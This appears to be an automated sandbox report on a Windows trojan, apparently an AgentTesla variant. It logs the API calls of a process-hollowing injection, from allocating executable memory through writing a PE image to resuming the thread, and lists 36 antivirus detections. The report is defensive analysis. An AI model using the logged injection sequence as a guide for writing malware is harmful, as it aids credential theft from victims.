NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1904 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000025c	1	0
WriteProcessMemory Sept. 22, 2021, 9:45 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPEL¼öSà \|Ô@@.text{\| ` base_address: 0x00400000 process_identifier: 1904 process_handle: 0x0000025c	1	1
WriteProcessMemory Sept. 22, 2021, 9:45 a.m.	buffer: base_address: 0x00401000 process_identifier: 1904 process_handle: 0x0000025c	1	1
WriteProcessMemory Sept. 22, 2021, 9:45 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1904 process_handle: 0x0000025c	1	1
NtSetContextThread Sept. 22, 2021, 9:45 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4314240 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000254 process_identifier: 1904	1	0
NtResumeThread Sept. 22, 2021, 9:45 a.m.	thread_handle: 0x00000254 suspend_count: 1 process_identifier: 1904	1	0

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Lionic	Trojan.Win32.Malicious.4!c
Elastic	malicious (high confidence)
DrWeb	Trojan.Siggen15.15172
MicroWorld-eScan	Trojan.GenericKD.37612725
FireEye	Generic.mg.571fbd383fdd865a
ALYac	Gen:Variant.Bulz.739379
Malwarebytes	Trojan.Crypt.MSIL
Alibaba	Trojan:Win32/Kryptik.ali2000016
Cybereason	malicious.966604
BitDefenderTheta	Gen:NN.ZemsilF.34170.Zq0@aOiGFLj
Cyren	W32/Trojan.GQW.gen!Eldorado
Symantec	Trojan.Gen.2
ESET-NOD32	a variant of MSIL/GenKryptik.FKXA
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan-Spy.MSIL.Noon.gen
BitDefender	Trojan.GenericKD.37612725
Ad-Aware	Trojan.GenericKD.37612725
Emsisoft	Trojan.Agent (A)
Comodo	TrojWare.Win32.UMal.viksq@0
TrendMicro	TROJ_FRS.0NA103IL21
McAfee-GW-Edition	BehavesLike.Win32.Generic.cc
Sophos	Mal/Generic-S
Ikarus	Trojan.MSIL.Krypt
Avira	TR/AD.Swotter.hgwjv
Kingsoft	Win32.Troj.Undef.(kcloud)
Microsoft	Trojan:MSIL/AgentTesla.JTG!MTB
Gridinsoft	Trojan.Win32.Agent.oa
GData	Trojan.GenericKD.37612725
Cynet	Malicious (score: 99)
MAX	malware (ai score=86)
TrendMicro-HouseCall	TROJ_FRS.0NA103IL21
SentinelOne	Static AI - Malicious PE
Fortinet	MSIL/GenKryptik.FKXA!tr
Webroot	W32.Trojan.Gen
CrowdStrike	win/malicious_confidence_100% (W)

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All